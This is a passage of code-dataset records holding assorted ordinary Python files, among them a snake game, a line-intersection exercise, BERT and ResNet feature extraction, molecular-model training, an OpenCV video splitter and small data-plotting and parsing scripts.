snakeLength):\r\n            del snakeList[0]\r\n        for eachSegment in snakeList[:-1]:\r\n            if(eachSegment == allspritesList):\r\n                gameOver = True\r\n        snake(blockSize, snakeList)\r\n        pygame.display.update()\r\n\r\n        if(lead_x >= randomAppleX and lead_x <= randomAppleX+AppleThickness):\r\n            if(lead_y >= randomAppleY and lead_y <= randomAppleY+AppleThickness):\r\n                randomAppleX = round(random.randrange(\r\n                    0, window_width-blockSize)/10.0)*10.0\r\n                randomAppleY = round(random.randrange(\r\n                    0, window_height-blockSize)/10.0)*10.0\r\n                snakeLength += 1\r\n        \r\n        clock.tick(FPS)\r\n    pygame.quit()\r\n    quit()\r\ngameloop()\r\n","sub_path":"Slithering.py","file_name":"Slithering.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"114714942","text":"# 16.3 Intersection\n\"\"\"\nGiven two straight line segments (represented as a start point and an end point), compute the point of intersection, if any.\n\"\"\"\nimport random\n\ndef mxpb(line):\n    horizontal = False\n    vertical = False\n    x1 = line[0][0]\n    y1 = line[0][1]\n    x2 = line[1][0]\n    y2 = line[1][1]\n    if y1 is y2:\n        return False, \"hor\"\n    elif x1 is x2:\n        return False, \"ver\"\n    else:\n        slope = (y1 - y2)/(x1 - x2)\n        b = y1 - x1*slope\n        return b, slope\n\ndef intersect(lineA, lineB):\n    Ax1 = lineA[0][0]\n    Ay1 = lineA[0][1]\n    Ax2 = lineA[1][0]\n    Ay2 = lineA[1][1]\n    Bx1 = lineB[0][0]\n    By1 = lineB[0][1]\n    Bx2 = lineB[1][0]\n    By2 = lineB[1][1]\n    bA, slopeA = mxpb(lineA)\n    bB, slopeB = mxpb(lineB)\n    if (slopeA is \"hor\" and slopeB is \"hor\") or (slopeA is \"ver\" and slopeB 
is \"ver\"):\n return \"Parallel\"\n if (bA is False and bB is False):\n if slopeA is \"hor\":\n x = Bx1\n y = Ay1\n elif slopeB is \"hor\":\n x = Bx1\n y = Ay1\n elif slopeA is \"hor\" and bB is not False:\n x = (Ay1 - bB)/slopeB\n y = Ay1\n elif slopeB is \"hor\" and bB is not False:\n x = (By1 - bA)/slopeA\n y = By1\n elif slopeA is \"ver\" and bB is not False:\n x = Ax1\n y = Ax1 * slopeB + bB\n elif slopeB is \"ver\" and bB is not False:\n x = Bx1\n y = Bx1 * slopeA + bA\n elif slopeB is slopeA:\n return \"Parallel\"\n else:\n x = (bB - bA)/(slopeA - slopeB)\n y = x * slopeA + bA\n if ((x >= Ax1 and x <= Ax2) or (x >= Ax2 and x <= Ax1))\\\n and ((x >= Bx1 and x <= Bx2) or (x >= Bx2 and x <= Bx1))\\\n and ((y >= Ay1 and y <= Ay2) or (y >= Ay2 and y <= Ay1)) \\\n and ((y >= By1 and y <= By2) or (y >= By2 and y <= By1)):\n return x, y\n return False\n\ndef makeLines(range):\n return [[random.randint(-range, range), random.randint(-range, range)],\\\n [random.randint(-range, range), random.randint(-range, range)]],\\\n [[random.randint(-range, range), random.randint(-range, range)], \\\n [random.randint(-range, range), random.randint(-range, range)]]\n\nline1, line2 = makeLines(100)\nprint(line1)\nprint(line2)\nprint(intersect(line1, line2))","sub_path":"Coding Challenges/Exercise Problems/H Moderate/16.3 Intersection.py","file_name":"16.3 Intersection.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"647491018","text":"#!/usr/bin/env python3\nimport json\nimport transformers\nfrom transformers import (BertTokenizer, BertModel, BertConfig,\n AlbertModel, AlbertConfig, AlbertTokenizer,\n ElectraConfig, ElectraTokenizer, ElectraModel,\n )\nimport numpy as np\nimport torch\nimport argparse\nimport os\nfrom multiprocessing import Pool\nfrom tqdm import tqdm\nfrom torch.utils.data import Dataset\nfrom torch.nn.utils.rnn import pad_sequence\nimport pickle\n\ndef collate_fn(batch):\n batch.sort(key=lambda x: x[0].shape[0] , reverse=True)\n input_ids, re_2_o, attn_mask, labels = zip(*batch)\n input_ids = pad_sequence(input_ids, True)\n #re_2_o = pad_sequence(re_2_o[0], True)\n attn_mask = pad_sequence(attn_mask, True)\n return input_ids, attn_mask, re_2_o, labels\n\nclass Sentence(Dataset):\n def __init__(self, data):\n self.data = data\n def __len__(self):\n return len(self.data)\n def __getitem__(self, idx):\n input_ids, re_2_o, labels = self.data[idx]\n return input_ids, np.asarray(re_2_o), torch.ones_like(input_ids).float(), labels\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", \"--model\", type = str, help = \"LM used to extract features\")\n parser.add_argument(\"-i\", \"--input\", type = str, help = \".json file to be retokenized\")\n parser.add_argument(\"-o\", \"--output\", type = str, help = \"output feature directory\")\n parser.add_argument('--layer', type = int, help = \"layer from which feature should be extracted\")\n parser.add_argument(\"-c\", \"--config\", type = str, help = \"config for model\")\n parser.add_argument(\"-t\", \"--tokenizer\", type = str, help = \"path to vocab file for tokenizer\")\n parser.add_argument(\"-l\", \"--label\", type = str, help = \"Path to label.txt\")\n parser.add_argument(\"-p\", \"--probe\", type = str, help = \"Probed task name\")\n parser.add_argument(\"--data_type\", type = str, help = \"train, dev, or test set\")\n args = parser.parse_args()\n\n label_dict = {}\n with open(args.label, 'r') as 
f:\n line_id = 0 \n while True:\n line = f.readline()\n if line == '': break\n line = line.rstrip()\n label_dict[line] = line_id\n line_id += 1\n \n if 'albert' in args.model:\n model_type = 'albert'\n tokenizer = AlbertTokenizer(vocab_file = args.tokenizer)\n config = AlbertConfig.from_json_file(args.config)\n model = AlbertModel.from_pretrained(pretrained_model_name_or_path = None,\n config = config,\n state_dict = torch.load(args.model))\n elif 'bert' in args.model:\n model_type = 'bert'\n tokenizer = BertTokenizer(vocab_file = args.tokenizer)\n config = BertConfig.from_json_file(args.config)\n model = BertModel.from_pretrained(pretrained_model_name_or_path = None,\n config = config,\n state_dict = torch.load(args.model))\n elif 'electra' in args.model:\n model_type = 'electra'\n tokenizer = ElectraTokenizer(vocab_file = args.tokenizer)\n config = ElectraConfig.from_json_file(args.config)\n model = ElectraModel.from_pretrained(pretrained_model_name_or_path = None,\n config = config,\n state_dict = torch.load(args.model))\n else:\n raise NotImplementedError(\"The model is currently not supported\")\n \n def process_line(line):\n data = json.loads(line)\n tokens = data['text'].split(' ')\n labels = data['targets']\n return tokens, labels\n\n def retokenize(tokens_labels):\n tokens, labels = tokens_labels \n retokenized = []\n re_2_o = [] # same length as retokenized sequence, store the mapping of index from retokenized to original seq\n for word_id, token in enumerate(tokens):\n token = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(token))\n retokenized.extend(token)\n re_2_o.extend([word_id for _ in range(len(token))])\n retokenized.insert(0, tokenizer.cls_token_id)\n retokenized.append(tokenizer.sep_token_id)\n input_ids = torch.tensor(retokenized)\n return input_ids, re_2_o, labels\n\n pool = Pool(4)\n with open(args.input, 'r') as f:\n processed_data = pool.map(process_line, f)\n pool.close()\n pool.join()\n #print(len(processed_data))\n\n processed_data = list(map(retokenize, processed_data))\n\n print(\"Total number of sentences: \", len(processed_data))\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n model.eval().to(device)\n\n result = []\n\n dataloader = torch.utils.data.DataLoader(Sentence(processed_data),\n batch_size = 48, \n num_workers = 32,\n collate_fn = collate_fn)\n\n def post_process(fn_input):\n feature = [] \n model_output, re_2_o, labels, seq_len, input_ids = fn_input\n model_output = model_output[:seq_len][1:-1]\n for target in labels:\n span1 = []\n for pos in range(target['span1'][0], target['span1'][1]):\n select = np.where(np.asarray(re_2_o) == pos)[0]\n span1.extend(model_output[select])\n span1 = np.stack(span1).mean(0)\n# print(span1.shape)\n if 'span2' in target.keys():\n span2 = []\n for pos in range(target['span2'][0], target['span2'][1]):\n select = np.where(np.asarray(re_2_o) == pos)[0]\n span2.extend(model_output[select])\n span2 = np.stack(span2).mean(0)\n else:\n span2 = None\n# print(target['label']) \n label = label_dict[target['label']]\n if span2 is not None:\n feature.append([label, span1, span2])\n else:\n feature.append([label, span1])\n return feature\n\n\n for input_ids, attn_mask, re_2_o, labels in tqdm(dataloader):\n with torch.no_grad():\n model_output = model(input_ids.to(device), \n attention_mask = attn_mask.to(device),\n output_attentions = True, \n output_hidden_states = True)\n if model_type == 'electra':\n model_output = model_output[1][args.layer].detach().cpu().numpy() ## TODO: if albert or bert: get [2] if 
electra, get [?]\n else:\n model_output = model_output[2][args.layer].detach().cpu().numpy() ## TODO: if albert or bert: get [2] if electra, get [?]\n seq_len = attn_mask.sum(-1).cpu().long().numpy()\n map_input = [*zip(model_output, re_2_o, labels, seq_len, input_ids)]\n for x in map(post_process, map_input):\n result.extend(x)\n\n #processed_data = list(map(post_process, result))\n processed_data = result\n step = args.model.split('_')[-1].split('.')[0]\n output_dir = os.path.join(args.output, args.probe + '-' + args.data_type + '-' + model_type + '-' + step + '.pkl')\n with open(output_dir, 'wb') as f:\n pickle.dump(processed_data, f)\n \n","sub_path":"Sec-3:Edge-Probing/preprocess/multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":6501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"543337522","text":"import torch as th\n\nimport torch.nn as nn\nfrom sch import SchNetModel\nfrom mgcn import MGCNModel\nfrom torch.utils.data import DataLoader\nfrom Alchemy_dataset import TencentAlchemyDataset, batcher\n\n\ndef train(model=\"sch\", epochs=80, device=th.device(\"cpu\")):\n alchemy_dataset = TencentAlchemyDataset()\n alchemy_loader = DataLoader(dataset=alchemy_dataset,\n batch_size=20,\n collate_fn=batcher(device),\n shuffle=False,\n num_workers=0)\n\n if model == \"sch\":\n model = SchNetModel(norm=True, output_dim=12)\n elif model == \"mgcn\":\n model = MGCNModel(norm=True, output_dim=12)\n\n model.set_mean_std(alchemy_dataset.mean, alchemy_dataset.std, device)\n model.to(device)\n \n loss_fn = nn.MSELoss()\n MAE_fn = nn.L1Loss()\n optimizer = th.optim.Adam(model.parameters(), lr=0.0001)\n\n for epoch in range(epochs):\n\n w_loss, w_mae = 0, 0\n model.train()\n\n for idx, batch in enumerate(alchemy_loader):\n\n res = model(batch.graph)\n loss = loss_fn(res, batch.label)\n mae = MAE_fn(res, batch.label)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n w_mae += mae.detach().item()\n w_loss += loss.detach().item()\n\n w_mae /= idx + 1\n print(\"Epoch {:2d}, loss: {:.7f}, mae: {:.7f}\".format(\n epoch, w_loss, w_mae))\n\n\nif __name__ == \"__main__\":\n device = th.device('cuda' if th.cuda.is_available() else 'cpu')\n train(\"sch\", 80, device)\n","sub_path":"dgl/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"203860670","text":"\nvar = 1\nvar2 = '2'\nvar3 = 'Privet Vitalik'\nvar_list = [var, var2, {'d': 323, 1: 3424}]\nvar_list.append(var3)\nnew_list = [print, print]\n\nnew_list.append(var_list)\n\nget_print = new_list[-1]\nsecond_list = get_print\n\nsecond_list.append('213213213123123')\n\nvar_tuple = (1, 2, 3, 3, '243234', 'a', 'a', 10, 10)\n\nvar_dict = {\n 1: 'New car',\n var2: var_list,\n 'Vasya': 33,\n\n}\nprint(var_dict[var2])\n","sub_path":"base_type/less.py","file_name":"less.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"154083484","text":"from apr03a import *\n\nif __name__ == \"__main__\":\n jane = Manager(\"Jane Doe\", 100000)\n john = Employee(\"John Brown\", \"tech support\", 80000)\n kate = Employee(\"Kate Smith\", \"tech support\", 75000)\n betty = Employee(\"Betty Zubert\", \"secretary\", 40000)\n anne = Employee(\"Anne Graham\", \"janitor\", 35000)\n sam = Employee(\"Sam Simon\", \"personal trainer\", 50000)\n\n sales = Department(jane, john, kate, 
betty, anne)\n\n sales[3] = sam\n\n lnames = []\n for e in sales:\n lnames.append(e.lastname())\n lnames.sort()\n print(\"\\nDepartment members sorted by last name: \\n\")\n for l in lnames:\n print(l)\n\n print(\"\\nSalary Data: \\n\")\n\n for i in range(len(sales)):\n print(\"%-12s $%7d\"%(sales[i].lastname(), sales[i].salary()))\n\n\n\n\n\n","sub_path":"OOP - Python/CODE notes/CODEnotes/apr03atest2-1.py","file_name":"apr03atest2-1.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21624894","text":"# coding=utf-8\nimport time\n\nimport os\n\nimport cv2\nimport random\n\n\ndef division(path, path2):\n file_list = os.listdir(path)\n for file in file_list:\n if os.path.splitext(file)[1] != '.mp4':\n continue\n\n # 定义此文件号\n file_temp = \"temp\" + time.strftime('_%Y%m%d_%H%M%S_', time.localtime())\n file_capture = cv2.VideoCapture(path + file)\n\n # 判断视频是否打开\n if not file_capture.isOpened():\n return False\n\n # 获取原视频的帧率\n fps = file_capture.get(cv2.CAP_PROP_FPS)\n # 获取原视频帧的大小\n size = (int(file_capture.get(cv2.CAP_PROP_FRAME_WIDTH)),\n int(file_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n # 获取原视频的总帧数\n frame_count = file_capture.get(cv2.CAP_PROP_FRAME_COUNT)\n # 定义帧计数\n i = 1\n # 定义文件序号\n j = 1\n\n fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n video_writer = cv2.VideoWriter(path2 + file_temp + str(j) + '.mp4', fourcc, random.randint(-4, 4) + fps, size)\n\n # 读第一帧\n success, frame = file_capture.read()\n\n print(\"正在启动文件分割\" + file)\n while success:\n # 写此文件\n video_writer.write(frame)\n i = i + 1\n # 每900帧截成一个新文件\n if i % 900 == 0:\n print(\"已完成:\" + str(int(i / frame_count * 100)) + \"%\")\n j = j + 1\n # 声明新文件,且对fps进行变速\n video_writer = cv2.VideoWriter(path2 + file_temp + str(j) + '.mp4', fourcc,\n random.randint(-20, 20) + fps, size)\n # 加载 下一个文件\n success, frame = file_capture.read()\n print(\"分割完成\" + file)\n\n merge(path2, file, file_temp, j, fps, size)\n # return j\n\n\n# 传入 生成目标位置,文件名, 临时文件名,临时文件最大号,原文件fps,原文件size\ndef merge(path, file, file_temp, j, fps, size):\n fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n file_capture = cv2.VideoCapture(path + file_temp + str(1) + '.mp4')\n # 判断视频是否打开\n if not file_capture.isOpened():\n return False\n\n # 定义最终文件\n video_writer = cv2.VideoWriter(path + file, fourcc, fps, size)\n for i in range(1, j):\n file_capture = cv2.VideoCapture(path + file_temp + str(i) + '.mp4')\n # 判断视频是否打开\n if not file_capture.isOpened():\n return False\n\n # 读第一帧\n success, frame = file_capture.read()\n\n print(\"正在合并文件\" + file + \"(\" + str(i) + \"/\" + str(j) + \")\")\n while success:\n video_writer.write(frame)\n success, frame = file_capture.read()\n os.remove(path + file_temp + str(i) + '.mp4')\n print(\"合并文件\" + file + \"(完成)\")\n try:\n os.remove(path + file_temp + str(j) + '.mp4')\n except Exception as e:\n pass\n\n\nif __name__ == '__main__':\n try:\n # 硬盘路径(原视频存放路径)\n path = os.path.dirname(os.path.realpath(__file__)) + \"/\"\n # 切割后的视频存放路径\n path2 = path + \"process\"\n if not os.path.exists(path2):\n os.mkdir(path2, 0o777)\n if not os.path.exists(path2):\n print(\"警告,程序出错。无法新建process文件夹,请手动建立\")\n else:\n path2 = path2 + \"/\"\n division(path, path2)\n except Exception as e:\n print(\"警告,程序出错:\")\n print(e)\n","sub_path":"Video/SpeedAjustOpenCV.py","file_name":"SpeedAjustOpenCV.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"30808349","text":"\r\nfrom rest_framework import serializers\r\nfrom aporte.models import Aporte, Grupo#, Corrige\r\n\r\nclass AporteSerializer(serializers.ModelSerializer):\r\n grupo = serializers.CharField()\r\n\r\n class Meta:\r\n model = Aporte\r\n fields = '__all__'\r\n\r\n def to_representation(self, instance):\r\n data = super(AporteSerializer, self).to_representation(instance)\r\n data['selic'] = instance.present_value() or None\r\n data['grupo_name'] = instance.grupo.name or None\r\n return data\r\n\r\n def validate(self, data):\r\n grupo = data.get('grupo')\r\n try:\r\n grupo_id = Grupo.objects.get(name=grupo)\r\n except:\r\n g = Grupo(name=grupo)\r\n g.save()\r\n grupo_id = Grupo.objects.get(name=grupo)\r\n data.update({'grupo': grupo_id})\r\n return data\r\n\r\n# class CorrigeSerializer(serializers.ModelSerializer):\r\n# class Meta:\r\n# model = Corrige\r\n# fields = '__all__'\r\n\r\n# def to_representation(self, instance):\r\n# data = super(CorrigeSerializer, self).to_representation(instance)\r\n# data['selic'] = instance.present_value() or None\r\n# return data\r\n","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"448515123","text":"#!/usr/bin/python3\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport openpyxl\n\nfile = '2017-07-03 10_41 - Richa Upadhy.xlsx'\n\n\nbook3 = openpyxl.load_workbook(file)\nname = book3.get_sheet_names()[0]\n\ndata_part = pd.read_excel(file, sheet_name=name)\nchakra_values = data_part.iloc[22:29,1:3]\nchakra_symm = data_part.iloc[40:47,1:3]\n\nchakra_values1 = chakra_values.values.tolist()\nchakra_symm1 = chakra_symm.values.tolist()\nprint(chakra_symm1)\n#print(type(chakra_values1))\n#print(len(chakra_values1))\n#print(chakra_values1[0][0])\n\n\n# allocating the values in the corresponding list\nvalues=[]\nx1=[]\nasymm=[]\nx2=[]\nfor i in range(0,len(chakra_values1)):\n\tvalues.append(chakra_values1[i][1])\n\tx1.append(chakra_values1[i][0])\n\nfor i in range(0,len(chakra_symm1)):\n\tasymm.append(chakra_symm1[i][0])\n\tx2.append(chakra_symm1[i][1])\n\n\n# plotting the first graph\n\nplt.figure(1)\nplt.title('Values')\nplt.xlabel('chakras')\nplt.ylabel('values')\n\nbars = plt.bar( x1, values, 0.6, color='blue')\nfor bar in bars:\n\ty_val = bar.get_height()\n\tplt.text(bar.get_x() + 0.1, y_val + 0.1, y_val)\n\nplt.axis([-1,7,0,10])\n\n\n# plotting the second graph\n\nprint(x2)\nprint(asymm)\nplt.figure(2)\nplt.title('Asymmetry')\nplt.xlabel('chakras')\nplt.ylabel('asymmetric values')\n\nplt.plot( x2, asymm, 'ro', markersize=20)\nplt.plot([0.0,0.0],[-0.5,6.5], 0.1,color='blue')\n\nplt.plot([-1.9,1.9],[6.0,6.0], 0.1, color='blue')\nplt.plot([-1.9,1.9],[5.0,5.0], 0.05, color='blue')\nplt.plot([-1.9,1.9],[4.0,4.0], 0.05, color='blue')\nplt.plot([-1.9,1.9],[3.0,3.0], 0.05, color='blue')\nplt.plot([-1.9,1.9],[2.0,2.0], 0.05, color='blue')\nplt.plot([-1.9,1.9],[1.0,1.0], 0.05, color='blue')\nplt.plot([-1.9,1.9],[0.0,0.0], 0.05, color='blue')\n\nplt.axis([-2,2,-1,7])\nplt.show()\n","sub_path":"individual_graph/chakra_plot.py","file_name":"chakra_plot.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"79940317","text":"import xlrd\nimport xlwt\n\nfilepath='E:\\\\333.xlsx'\n\nfiletable=xlrd.open_workbook(filepath)\n\nfilesheets=filetable.sheets()\n\nfor i in 
range(len(filesheets)):\n print(filesheets[i].name)\n\n# filewrite=xlwt.Worksheet(filesheets[1],filepath,cell_overwrite_ok=True)\n\nws=xlwt.Workbook(filepath)\nwb=ws.add_sheet(\"123\")\n\nstyle0=xlwt.easyxf('font:name 微软雅黑,color-index black, bold on')\n\n\nwb.write(1,2,'测试写入')\n\nfor i in range(len(filesheets)):\n print(filesheets[i].name)\n#\n# ws.save('E:\\\\333.xls')\n\n\n\n","sub_path":"test_Interface/test_write.py","file_name":"test_write.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"15139221","text":"import os\nimport argparse\nimport pickle\nimport json\nimport glob\nfrom pathlib import Path\nfrom tqdm import tqdm\nfrom multiprocessing import Pool, cpu_count\nfrom toolz.itertoolz import partition_all\nfrom collections import namedtuple\n\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', help='read data from',\n type=str, default='/mnt/data/bert_wiki/wikidoc.all')\nparser.add_argument('--output', help='save data to',\n type=str, default='/mnt/data/pretrain_data/wikidoc.tk')\nparser.add_argument(\"--bert_model\", default=None, type=str, required=True,\n help=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n \"bert-large-uncased, bert-base-cased, bert-base-multilingual, bert-base-chinese.\")\nparser.add_argument('--cache_dir', help='cache dir',\n type=str, default='/mnt/data/bert-uncased-pretrained-cache/')\nparser.add_argument(\"--do_lower_case\", action='store_true',\n help=\"Set this flag if you are using an uncased model.\")\ndefault_process_count = max(1, cpu_count() - 1)\nargs = parser.parse_args()\n\n\ndef is_invalid(tk_list):\n if len(tk_list) >= 8:\n n_subword = 0\n for tk in tk_list:\n if tk.startswith('##'):\n n_subword += 1\n if float(n_subword)/float(len(tk_list)) > 0.7:\n return True\n return False\n\n\ndef get_token_id(tokenizer, tok_list):\n ids = []\n for tok in tok_list:\n ids.append(str(tokenizer.vocab[tok]))\n return ids\n\ndef process_doc(_file, output_file):\n # avoid access url too frequently\n if Path(os.path.join(args.cache_dir, 'vocab.txt')).exists():\n tokenizer_load_path = args.cache_dir\n else:\n tokenizer_load_path = args.bert_model\n tokenizer = BertTokenizer.from_pretrained(\n tokenizer_load_path, do_lower_case=args.do_lower_case, cache_dir=args.cache_dir)\n\n writer = open(output_file, 'w', encoding='utf-8')\n i = 0\n with open(_file, 'r', encoding='utf-8') as reader:\n for line in reader:\n i += 1\n \n if i > 500000:\n break\n line = line.replace('#', '')\n tk_list = tokenizer.tokenize(line)\n ids = get_token_id(tokenizer, tk_list)\n writer.write(' '.join(tk_list))\n writer.write('\\t')\n writer.write('\\t'.join(ids))\n writer.write('\\n')\n writer.close()\n \ndef main():\n process_doc(args.input, args.output)\n\nif __name__ == '__main__':\n main()\n","sub_path":"tokenize_corpus.py","file_name":"tokenize_corpus.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"190630784","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PIL import Image\nimport os, re, sys\n\ndef returnFormat(format):\n if format == \"bmp\":\n return \"BMP\"\n elif format == \"jpg\":\n return \"JPEG\"\n elif format == \"png\":\n return \"PNG\"\n elif format == \"gif\":\n return \"GIF\"\n else:\n print(format + \" は対応していません。\")\n sys.exit()\n\nif __name__ == '__main__':\n 
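# at least four command-line arguments are expected; argv[1] is the input file and argv[2] the target format\n    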
if len(sys.argv) > 4:\n fileName = sys.argv[1]\n format = sys.argv[2]\n\n img = Image.open(fileName, \"r\")\n width, height = img.size\n\n fileName = re.search(\"(? 2:\n mean = np.load(sys.argv[2]) - mean\nelse:\n mean = np.zeros(shape=3, dtype='float')\n\nn_classes = 4\n#FACTORS = [0.25]\nFACTORS = [1., 0.75, 0.5, 0.25, 0.1]\n\ndef sliding_window(image, stepSize, windowSize):\n # slide a window across the imag\n for y in xrange(0, image.shape[0] - windowSize[0] + stepSize, stepSize):\n for x in xrange(0, image.shape[1] - windowSize[1] + stepSize, stepSize):\n # yield the current window\n res_img = image[y:y + windowSize[1], x:x + windowSize[0]]\n change = False\n if res_img.shape[0] != windowSize[1]:\n y = image.shape[0] - windowSize[1]\n change = True\n if res_img.shape[1] != windowSize[0]:\n x = image.shape[1] - windowSize[0]\n change = True\n if change:\n res_img = image[y:y + windowSize[1], x:x + windowSize[0]]\n yield (x, y, x + windowSize[0], y + windowSize[1], res_img)\n\n\nrandom_seed = 0\nrandom.seed(random_seed)\nnp.random.seed(random_seed)\n\nlbl = [\"Normal\", \"Benign\", \"Invasive\", \"InSitu\"]\n\nflatten = lambda l: [item for sublist in l for item in sublist]\nlabels = list(set(flatten([l.split(' ') for l in lbl])))\n\nlabel_map = {l: i for i, l in enumerate(labels)}\ninv_label_map = {i: l for l, i in label_map.items()}\n\n# use ResNet50 model extract feature from fc1 layer\nbase_model = ResNet50(weights='imagenet', pooling=max, include_top = False)\ninput = Input(shape=(224,224,3),name = 'image_input')\nx = base_model(input)\nx = Flatten()(x)\nmodel = Model(inputs=input, outputs=x)\n\nX_mat = []\ny_mat = []\n\ntags = sys.argv[1]\nif basename(tags)[0] == \"n\":\n pre = \"Normal\"\nelif basename(tags)[0] == \"b\":\n pre = \"Benign\"\nelif basename(tags)[0:2] == \"iv\":\n pre = \"Invasive\"\nelif basename(tags)[0:2] == \"is\":\n pre = \"InSitu\"\n\nimage = imread(tags).astype('uint8')\nimg_feat_list = []\nfor fact in FACTORS:\n if fact == 0.1:\n img_scale = resize(image, (224,224))\n img_scale = img_as_ubyte(img_scale)\n elif fact != 1.:\n img_scale = rescale(image, fact)\n img_scale = img_as_ubyte(img_scale)\n else:\n img_scale = image\n img_scale = img_scale.astype(float)\n img_scale = img_scale - mean\n stepSize = 224\n windowSize = (224, 224)\n for x, y, x_e, y_e, x in sliding_window(img_scale, stepSize, windowSize):\n x = x.astype(float)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n\n features = model.predict(x)\n features_reduce = features.squeeze()\n img_feat_list.append(features_reduce)\n\nmatrix_img_feat = np.column_stack(img_feat_list)\nfor i in range(matrix_img_feat.shape[0]):\n matrix_img_feat[i] = np.sort(matrix_img_feat[i])\n\n\nX_mat.append(matrix_img_feat.flatten())\n\ntargets = np.zeros(n_classes)\ntargets[label_map[pre]] = 1\ny_mat.append(targets)\n\n\nX = np.array(X_mat)\n\ntrain_ResNet = pd.DataFrame(X)\ndata = {'label': [label_map[pre]]}\ny_pd = pd.DataFrame(data, columns=['label'])\ntrain_ResNet = pd.concat([y_pd, train_ResNet], axis = 1)\np = train_ResNet.shape[1]\nvec_res = train_ResNet.as_matrix().reshape(p)\nvec_res_p = np.zeros(p+1, dtype='float')\nvec_res_p[0] = label_map[pre]*100 + int(tags.split(\".\")[0][-3:]) - 1\nvec_res_p[1:] = vec_res\nnp.save(basename(tags).replace('.tif', '.npy'), vec_res_p)\n","sub_path":"partA/ExtractFromResNet.py","file_name":"ExtractFromResNet.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"18345371","text":"'''\nCalcualtes ReducerDataSkew heuristic'\nchecks for any skew in data of reducer input.\n'''\nfrom main import *\n\ndef ReducerDataSkew(i):\t\n\n\theuristic = heuristic_class()\n\tthresh_val = getattr(heuristic,reduce_threshold)\n\tval = getattr(heuristic,reduce_value)\n\tinsert = getattr(heuristic,insert_data)\n\t\n\tredskew_threshold = float(thresh_val(i,\"REDUCE_SHUFFLE_BYTES\"))\n\tredskew_value = val(i,\"REDUCE_SHUFFLE_BYTES\")\n\t\n\tpercent = 0.02*redskew_threshold\n\tif redskew_threshold - percent <= redskew_value <= redskew_threshold + percent:\n\t\tseverity=\"LOW\"\n\t\tscore=redskew_value\n\telse:\n\t\tseverity = \"HIGH\"\n\t\tscore=redskew_value\n\tinsert(i,score,severity,\"ReducerDataSkew\")\n\tprint (severity,score,i[0],\"ReducerDataSkew\")\n","sub_path":"heuristics/ReducerDataSkew.py","file_name":"ReducerDataSkew.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"558300209","text":"__all__ = ['crossValStatsMonParser', 'CrossValStatsMonParser']\n\nfrom RingerCore import ArgumentParser, BooleanStr, NotSet\n\n################################################################################\n# Create cross valid monitoring job parser file related objects\n################################################################################\n\ndef CrossValStatsMonParser():\n crossValStatsMonParser = ArgumentParser(add_help = False, \n description = 'Retrieve cross-validation-monitoring information performance.',\n conflict_handler = 'resolve')\n reqArgs = crossValStatsMonParser.add_argument_group( \"required arguments\", \"\")\n reqArgs.add_argument('-f', '--file', action='store', required = True,\n help = \"\"\"The crossvalidation data files or folders that will be used to run the\n analysis.\"\"\")\n reqArgs.add_argument('-d','--dataPath', default = None, required = True,\n help = \"\"\"The tuning data file to retrieve the patterns.\"\"\")\n optArgs = crossValStatsMonParser.add_argument_group( \"optional arguments\", \"\")\n optArgs.add_argument('--debug', default=False, type=BooleanStr,\n help = \"Debug mode\")\n optArgs.add_argument('--grid', default=False, type=BooleanStr,\n help = \"Enable the grid filter tag.\")\n optArgs.add_argument('--doBeamer', default=False, type=BooleanStr,\n help = \"Enable the beamer creation.\")\n optArgs.add_argument('--doShortSlides', default=False, type=BooleanStr,\n help = \"Enable the beamer short slides.\")\n optArgs.add_argument('--reference', default=None,\n help = \"The reference string to be used.\")\n optArgs.add_argument('--output', '-o', default=\"report\", \n help = \"the output file path to the data\"\n )\n optArgs.add_argument('--choicesfile', '-c', default=None, \n help = \"the .mat file with the neuron choices \"\n )\n return crossValStatsMonParser\ncrossValStatsMonParser = 